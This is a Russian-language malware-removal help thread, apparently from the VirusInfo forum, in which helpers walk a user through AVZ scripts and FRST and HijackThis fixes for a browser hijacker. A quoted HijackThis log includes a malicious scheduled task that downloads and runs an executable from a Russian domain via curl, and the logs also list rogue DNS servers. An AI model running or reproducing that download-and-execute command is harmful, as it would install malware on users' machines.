здравствуйте.
через каждые 5-7 минут в браузерах открываются вкладки с сайтами на которые не пускает антивирус Dr.Web.
выполнил лечение утилитой CureIt - не помогло.
помогите пожалуйста.
здравствуйте.
через каждые 5-7 минут в браузерах открываются вкладки с сайтами на которые не пускает антивирус Dr.Web.
выполнил лечение утилитой CureIt - не помогло.
помогите пожалуйста.
Уважаемый(ая) [B]wolya[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
ExecuteFile('schtasks.exe', '/delete /TN "2infoblogcomynors" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "all-journalnethilxozs" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "browser-netnetrnors" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "good-journalorgcroazs" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "green5newsnetsasds" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "green5newsorgaasds" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "hit5newsnetdasds" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "hitnews1orgxcoms" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "httppanameraporscheecomkordons" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "journal-goodorgbtechs" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "linenewsorgleeboos" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "myblognewsorggasds" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "new1newsnetvzxcs" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "news-truenetzozas" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "newstop5netqnors" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "newstop5orgwnors" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "notbadnewsorgmorfs" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "youfreenewsnetncoms" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "top5newsorgenors" /F', 0, 15000, true);
QuarantineFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe','');
QuarantineFile('C:\Windows\TEMP\clearcache.dll','');
DeleteFile('C:\Windows\TEMP\clearcache.dll','32');
DeleteFile('C:\Users\User\AppData\Local\Amigo\Application\amigo.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\amigo','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ldwcoyprdg','command');
DeleteFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.[/code]Будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
[code]begin
CreateQurantineArchive('c:\quarantine.zip');
end.[/code][b]c:\quarantine.zip[/b] пришлите по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин[/b][/u][/color] [b]над первым сообщением[/b] темы.
[B][COLOR="Red"]Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger[/COLOR][/B]
крассная ссылка не ссылка (не нажимается - это просто текст). прислать вложением?
перестали открываться окна браузера с вирусным содержимым. спасибо большое.
заметил, что пропала языковая панель и не включается через настройки. в Regedit не заходит и не показывает ошибок при его запуске. ОС на компьютере Windows 7x64.
Перечитайте последние 2 строки сообщения хелпера и сделайте, что он просит.
[QUOTE=thyrex;1450438]Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger[/QUOTE]
выполнил правила, прикрепляю новые логи Autologer
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url]:[code]O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238
O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31
O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203
O22 - Task: (Ready) curl.job - C:\Documents and Settings\Admin\Application Data\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Documents and Settings\Admin\Application Data\curl\curl.exe"
O22 - Task: (Ready) curls.job - C:\Documents and Settings\Admin\Application Data\curl\curl.exe[/code]
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
отчёты FRST
1. Откройте [b]Блокнот[/b] и скопируйте в него приведенный ниже текст
[code]
CreateRestorePoint:
HKU\S-1-5-21-1417001333-854245398-1801674531-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ertowap.ru/?utm_source=startpage03&utm_content=117e0d6c7b95dc5e3c4d6ef9a0fa4da4&utm_term=EF09D419C3961A01B8BAF0B735D68642&utm_d=20171129
CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ddadgcdmddljmpkpinkalnepdepplpkj] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gkcfopbmpihfnphgamgibhkdhdgnplfp] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ledkfmfckejkemlmpckiaoaldhldfmbe] - hxxp://clients2.google.com/service/update2/crx
2018-01-10 15:31 - 2018-01-10 15:31 - 000000000 ____D C:\Documents and Settings\Admin\Local Settings\Application Data\Unnyhog
2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\0hbPf949CCH5.exe
2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\59PO9Birl4bJ.exe
2017-11-29 17:13 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\D3Eri0Y7DUEU.exe
2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\dcsyoUS0BfIA.exe
2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\fvUEGf4ytjzL.exe
2017-05-05 08:37 - 2017-05-05 08:37 - 000012288 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\LUIBcjHGgrklrTwSJPPt.DLL
2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\n48Qi09M5VtN.exe
2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\rffGbXNoqpRw.exe
2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\sNiQzCjLIF4B.exe
2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\xUiw6losXNx7.exe
2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y3qb4F8oUHmt.exe
2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y6JGXqoGPGU5.exe
Reboot:
[/code]
2. Нажмите [b]Файл[/b] – [b]Сохранить как[/b]
3. Выберите папку, откуда была запущена утилита [b]Farbar Recovery Scan Tool[/b]
4. Укажите [b]Тип файла[/b] – [b]Все файлы (*.*)[/b]
5. Введите имя файла [b]fixlist.txt[/b] и нажмите кнопку [b]Сохранить[/b]
6. Запустите FRST, нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание: будет выполнена [b]перезагрузка компьютера[/b].
выполнил. высылаю Fixlog.txt
Проблема решена?
Подмены exe файлов при скачивании из интернета уже нет.
при открытии хрома открывался вот этот сайт
[url]hxxp://pzemisa.ru/?utm_source=startpage03&utm_content=444ada4fc4b77fb48ca9f21492a9fa0d&utm_term=EF09D419C3961A01B8BAF0B735D68642&utm_d=20171129[/url]
в настройках хрома было установлено при запуске открывать заданные страницы - список был пуст.
я переключил настройку на - открывать ранее открытые страницы.
больше эта pzemisa.ru не открывается.
пока наблюдаю. ничего подозрительного пока не вижу.
Спасибо вам большое!
10 дней прошло с момента лечения. ничего подозрительного не замечено. все вредоносные ссылки выявленные входе лечения добавил в список блокирования, что бы кто-то из домашних опять не подцепил эту заразу. думаю проблему вы решили. спасибо вам огромное!
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]4[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]